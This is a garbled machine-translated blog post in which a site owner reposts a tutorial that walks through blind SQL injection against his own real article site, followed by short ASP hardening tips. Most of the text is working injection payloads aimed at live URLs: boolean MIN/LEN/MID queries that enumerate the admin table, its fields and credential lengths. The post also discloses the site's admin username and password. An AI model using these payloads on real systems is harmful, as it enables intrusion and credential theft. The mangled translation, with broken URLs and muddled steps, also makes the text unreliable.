(You can search for Google, www.jinshouzhi.org is available)
This article was issued in October last year. I found this year. I have been working for this since my website. Sshbbs.NET has been treated as a tutorial
Hit, huh, huh, dizzy. Until there is a good netizen to remind me that I have done some processing. Don't use the attack on my website directly by the tutorial, huh, huh, I have already hit the needle :) Go to the exercise of others.
:) The following is the article section, as well as an animation tutorial, huh, hunger :)
Battle SQL Injection
Target: Www.shbbs.net article publishing system ~~
Purpose: To demonstrate SQL Injection to the novice, please don't destroy ~~
Open http://www.shbbs.net/Article/List.asp?id=974
Add a 'after http://www.shbbs.net/article/list.asp?id=974
http://www.shbbs.net/Article/List.asp?id=974 'error! ID is not filtered.
Great. Now the step is 1, guess the table 2 of the administrator account, guess the field name of the user in the corresponding table and the field name of the password. 3, guess the length of the user name and the length of the password. 3, guess the user name and password 4, Find the management interface to go in to log in.
Guess administrator form: http://www.shbbs.net/Article/List.asp?id=974 and 1 = (SELECT MIN (ID) from admin) '// min (id) return table
The smallest value of the ID. Return to the article, prove that there is an admin table. If there is no return, it proves that an error! There is no admin, this table.
Guess the user's field name http://www.shbbs.net/Article/List.asp?id=974 and 1 = (select min (id) from admin where user = 'qqq') Returns the error message, indicating that there is no User User field name
Come ~~ http://www.shbbs.net/Article/List.asp? Id = 974 and 1 = (select min (id) from admin where
Username = 'qqq') did not return an error message. Also returned to an article, prompting to find the corresponding article certificate: There is a username this field in Admin. Just the username is not qqq.
Guess code's field name http://www.shbbs.net/Article/List.asp?id=974 and 1 = (select min (id) from admin where passwd = 'qqq') returns an error message, indicating that there is no passwd Password field name
Come ~~ http://www.shbbs.net/Article/List.asp? Id = 974 and 1 = (select min (id) from admin where
Password = 'qqq') did not return an error message. None returned to the article. Proven not to find the corresponding article. Proof: There is a password in Admin. Just the password is not QQQ now to guess the user's field name length http: // www . SHBBS.NET / ARTICLE / LIST.ASP? ID = 974 and 1 = (Select Min (ID) from admin where
Len (username)> 8) correct ~~ http://www.xuanke.com/wz/list.asp? id = 47 and 1 = (SELECT MIN (ID) from admin where len (username) <15) correct ~ ~ User name length is greater than 8 less than 15 http: //www.shbbs.net/Article/List.asp? Id = 974 and 1 = (SELECT MIN (ID) from admin where
Len (username) = 10) Ha ha ~~ The username length is 10` `~~
Guess code length http://www.shbbs.net/Article/List.asp?id=974 and 1 = (Select Min (ID) from admin where
Len (password)> 8) correct ~~ http://www.shbbs.net/Article/List.asp? id = 974 and 1 = (Select Min (ID) from admin where
Len (Password) <15) correct ~~~ Password length is also greater than 8 less than 15 http: //www.shbbs.net/Article/List.asp? ID = 974 and 1 = (SELECT MIN (ID) from admin where
Len (password) = 10) Ha ha ~~ The password length is 10.
The length of the user name is: 10 password length is: 10
Now guess the user name. Http://www.shbbs.net/Article/List.asp?id=974 and 1 = (Select Min (ID) from admin where
MID (username, 1, 1) = 'a') is wrong ~~
I will guess ~~ http://www.shbbs.net/article/list.asp? Id = 974 and 1 = (select min (id) from admin where
MID (username, 1, 1) = 's') huh ~~ Correct ~~ The first place in the username is S
Guess the second place of the user name ~~ http://www.shbbs.net/Article/List.asp? Id = 974 and 1 = (SELECT MIN (ID) from admin where
MID (username, 2, 1) = 'h') The second bit of the username is h
Due to time relationship, I have already guess it, user name: shbbsadmin
Let's guess the password ~~ Guess code is the same as guerse the user name ~~ http://www.shbbs.net/article/list.asp? Id = 974 and 1 = (Select Min (ID) from admin where
MID (Password, 1, 1) = 's')
Guess, guess ~
Due to the time relationship, I have guess it, huh, huh ~ ~ password: shbbsadmin haha ~~ Like the user name ~~~~
User: SHBBSADMIN Password: SHBBSADMIN
============================================================================================================================================================================================================= ========== Oh, I used to use the network article system. I have written a tutorial by SQL injection attacker to someone who downloads some SB. I will take me. Fortunately, my forum and article release system username password Various, otherwise the loss can be miserable
So cultivating a little written code habit of paying attention to safety.
If the id or other numerical parameters are plus CINT () to make type conversion, the injection is absolutely unsuccessful, if the character type parameters do not have to be afraid, will be
Do a character part, no effect.
Alternatively, the length is limited to the incoming parameters, such as if Len ("ID"))> 5 Then Response.end simple sentence makes injection attackers.
